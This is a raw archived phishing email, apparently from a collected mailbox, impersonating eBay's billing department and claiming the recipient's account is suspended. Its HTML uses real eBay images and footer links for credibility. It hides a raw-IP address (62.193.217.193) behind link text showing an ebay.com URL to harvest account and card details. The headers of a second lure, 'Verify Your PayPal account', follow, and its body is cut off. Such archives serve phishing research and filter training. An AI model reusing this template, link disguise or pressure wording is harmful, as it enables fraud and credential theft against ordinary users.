From: "eBay Billing Dep." <aw-confirm@eBay.com>
Reply-To: "eBay Billing Dep." <aw-confirm@eBay.com>
To: jose@monkey.org
Subject: your eBay account has been suspended.
Date: Sat, 09 Apr 2005 15:50:45 +0400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--83300452264187568"
X-IP: 194.176.198.3
X-Priority: 1
Status: O
X-Status: 
X-Keywords:                  
X-UID: 91

----83300452264187568
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable



<table width=3D"450" height=3D"376">
  <tr>
    <td bgcolor=3D"#ffffff" width=3D"575" height=3D"372">
    <table cellpadding=3D"0" cellspacing=3D"0" width=3D"100%">
      <tr>
        <td style width=3D"100%">
        <table xmlns:x=3D"urn:schemas-microsoft-com:xslt" xmlns:ebay=3D"eB=
ayV3" xmlns:co=3D"CheckoutV3" bgcolor=3D"#eeeef8" border=3D"0" cellpadding=
=3D"0" cellspacing=3D"0" width=3D"100%">
          <tr>
            <td nowrap=3D"nowrap" width=3D"1%">
            <img src=3D"http://pics.ebaystatic.com/aw/pics/email/syiSessio=
ns/hdrLeft_13x39.gif" width=3D"13" height=3D"39"></td>
            <td background=3D"http://pics.ebaystatic.com/aw/pics/email/syi=
Sessions/imgSpan_5x39.gif" nowrap=3D"nowrap" width=3D"98%">
            <b>Dear Valued <font size=3D"4">eBay</font> member</b></td>
            <td nowrap=3D"nowrap" valign=3D"bottom" width=3D"1=
%">
            <img src=3D"http://pics.ebaystatic.com/aw/pics/email/syiSessio=
ns/hdrRight_90x39.gif" width=3D"90" height=3D"39"></td>
          </tr>
        </table>
        <table xmlns:x=3D"urn:schemas-microsoft-com:xslt" border=3D"0" cel=
lpadding=3D"0" cellspacing=3D"0" width=3D"100%">
          <tr>
            <td>
            <img src=3D"http://pics.ebaystatic.com/aw/pics/spacer.gif" bor=
der=3D"0" height=3D"1" width=3D"10"></td>
            <td>
            <table xmlns:ebay=3D"eBayV3" xmlns:co=3D"CheckoutV3" align=3D"=
center" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"500">
              <tr>
                <td bgcolor=3D"#9999cc" width=3D"1">
                <img src=3D"http://pics.ebaystatic.com/aw/pics/spacer.gif"=
 border=3D"0" width=3D"1" height=3D"1"></td>
                <td width=3D"500">
                <table bgcolor=3D"#ececf7" border=3D"0" cellpadding=3D"2" =
cellspacing=3D"0" width=3D"400" height=3D"18">
                  <tr>
                    <td height=3D"5" width=3D"800">
                    <img src=3D"http://pics.ebaystatic.com/aw/pics/s.gif" =
height=3D"5" width=3D"1"><p>
                    <font face=3D"Verdana" size=3D"2">We regret to inform =
you that 
                    your eBay account has been suspended due to the violat=
ion of 
                    our site policy below:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
                    False or missing contact information - falsification o=
r 
                    imitation your name, address, and/or telephone number =

                    (including use of fax machines pager numbers, modems o=
r 
                    disconnected numbers). <br>
                    Due to the suspension of this account, please be advis=
ed you 
                    are prohibited from using eBay in any way. This prohib=
ition 
                    includes the registering of a new account. <br>
                    Please note that any seller fees due to eBay will 
                    immediately become due and payable. <br>
                    eBay will charge any amounts you have not previously 
                    disputed to the billing method currently on file.</fon=
t></p>
                    <p><font face=3D"Arial" size=3D"2">
                    <strong style=3D"font-weight: 400">
                    <font face=3D"Arial, Verdana" size=3D"2">
                    <a href=3D"http://62.193.217.193/acounts/memb/avncente=
r/dll87443/.BayISAPI.dll/hgdas676bsda6gwcv7zfcwfcwf34gfwf23g235f134f3fg3f&=
bhdfahva68532hbhwseBayISAPI.dllPaymentLanding&ssPageName=3DhhpayUSf&=3Duse=
rhgads&secure&ssl7r2vbd7d5b.html">
                    http://www.ebay.com/aw-cgi/eBayISAPI.dll?verifyccplace=
</a></font></strong></font></p>
                    <table cellSpacing=3D"0" cellPadding=3D"0" width=3D"45=
0">
                      <tr>
                        <td style=3D"WORD-WRAP: break-word" width=3D"450">=

                        <font face=3D"Arial, Verdana" size=3D"2">
                        <table cellSpacing=3D"0" cellPadding=3D"2" width=3D=
"525" border=3D"0">
                          <tr vAlign=3D"top">
                            <td width=3D"500"><font face=3D"Verdana" size=3D=
"-1">If 
                            you have recently updated your billing informa=
tion, 
                            please disregard this message as we are proces=
sing 
                            the changes you have made.</font>
                            <p><font face=3D"Arial" size=3D"2">
                            <strong style=3D"font-weight: 400"><font size=3D=
"2">This 
                            notification expires on</font>&nbsp;<b> July 3=
0, 2005.</b></strong></font></p>
                            <p>
                            <font face=3D"Verdana, Arial, Helvetica, sans-=
serif" size=3D"2">
                            Thank you for your prompt attention to this ma=
tter.</font></td>
                          </tr>
                        </table>
                        </font></td>
                      </tr>
                    </table>
                    <table cellSpacing=3D"0" cellPadding=3D"0" width=3D"45=
0">
                      <tr>
                        <td style=3D"WORD-WRAP: break-word" width=3D"450">=

                        <font face=3D"Arial, Verdana" size=3D"2">&nbsp;<ta=
ble cellSpacing=3D"0" cellPadding=3D"2" width=3D"575" border=3D"0">
                          <tr vAlign=3D"top">
                            <td width=3D"500">
                            <font face=3D"Arial, Verdana" size=3D"2">Thank=
 you for 
                            using eBay!<br>
                            &nbsp;</font></td>
                          </tr>
                        </table>
                        </font></td>
                      </tr>
                    </table>
                    </td>
                  </tr>
                  <tr>
                    <td width=3D"800">&nbsp;</td>
                    <td width=3D"4">&nbsp;</td>
                  </tr>
                  <tr>
                    <td height=3D"5" width=3D"800">
                    <img src=3D"http://pics.ebaystatic.com/aw/pics/s.gif" =
height=3D"5" width=3D"1"><font face=3D"Arial" size=3D"2"><strong><hr width=
=3D"575" color=3D"#C0C0C0">
                    </strong></font>
<p><font color=3D"#666666" face=3D"Arial, Verdana" size=3D"1">&nbsp;As out=
lined in our 
User Agreement, eBay will periodically send you information about site cha=
nges 
and enhancements. Visit our
<a href=3D"http://pages.ebay.com/help/community/png-priv.html?ssPageName=3D=
ADME:B:DS:US:18">
Privacy Policy</a> and
<a href=3D"http://pages.ebay.com/help/community/png-user.html?ssPageName=3D=
ADME:B:DS:US:17">
User Agreement</a> if you have any questions.</font></p>
                    <font face=3D"Arial, Verdana" color=3D"#666666" size=3D=
"1">
                    <p align=3D"center">Copyright =A9 2005 eBay Inc. All R=
ights 
                    Reserved.<br>
                    Designated trademarks and brands are the property of t=
heir 
                    respective owners.</p>
                    <p align=3D"center">eBay and the eBay logo are tradema=
rks of 
                    eBay Inc.</font></td>
                  </tr>
                </table>
                </td>
              </tr>
            </table>
            </td>
          </tr>
        </table>
        </td>
      </tr>
    </table>
    </td>
  </tr>
</table>


----83300452264187568--

From root@www.gayax.com  Sat Jul  2 18:07:45 2005
Return-Path: <root@www.gayax.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail1.monkey.org (mail1.monkey.org [65.23.81.153])
	by naughty.monkey.org (Postfix) with ESMTP id 830A3537147
	for <jose@login.monkey.org>; Sat,  2 Jul 2005 18:07:45 -0400 (EDT)
Received: from www.gayax.com (unknown [222.122.25.99])
	by mail1.monkey.org (Postfix) with ESMTP id 2DE2285ABA0
	for <jose@monkey.org>; Sat,  2 Jul 2005 18:07:43 -0400 (EDT)
Received: (from root@localhost)
	by www.gayax.com (8.11.6/8.11.6) id j62M7gj09254;
	Sun, 3 Jul 2005 07:07:42 +0900
Date: Sun, 3 Jul 2005 07:07:42 +0900
Message-Id: <200507022207.j62M7gj09254@www.gayax.com>
To: jose@monkey.org
Subject: Verify Your PayPal account***
